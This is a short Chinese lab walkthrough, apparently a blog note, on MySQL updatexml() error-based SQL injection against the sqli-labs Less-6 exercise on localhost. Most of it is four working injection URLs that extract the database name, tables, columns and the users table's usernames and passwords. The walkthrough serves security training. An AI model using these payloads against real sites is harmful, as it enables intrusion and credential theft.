updatexml报错注入的原理:
同extractvalue(),输入错误的第二个参数,即更改路径符号
函数updatexml(参数1,参数2,参数3)
参数1:string格式,为XML文档对象的名称
参数2:路径
参数3:string格式,替换查找到的符合条件的数据
http://127.0.0.1/sql/Less-6/?id=-2" union select 1,updatexml(1,concat(0x7e,(select database())),3),3--+
![](https://img-blog.csdnimg.cn/0f5bdc9cb39247cc8b5572501d90fe2a.png)
http://127.0.0.1/sql/Less-6/?id=-2" union select 1,updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() )),3),3--+
![](https://img-blog.csdnimg.cn/599bf6da93a249688b8bbe593f8382ec.png)
http://127.0.0.1/sql/Less-6/?id=-2" union select 1,updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users')),3),3--+
![](https://img-blog.csdnimg.cn/8ebe616e18d94fad96a70a0110a66ae7.png)
http://127.0.0.1/sql/Less-6/?id=-2" union select 1,updatexml(1,concat(0x7e,(select substring(group_concat(username,'-',password),1,30)from users)),3),3--+
![](https://img-blog.csdnimg.cn/52b076dfee2041f9ad3b73278fb40b5e.png)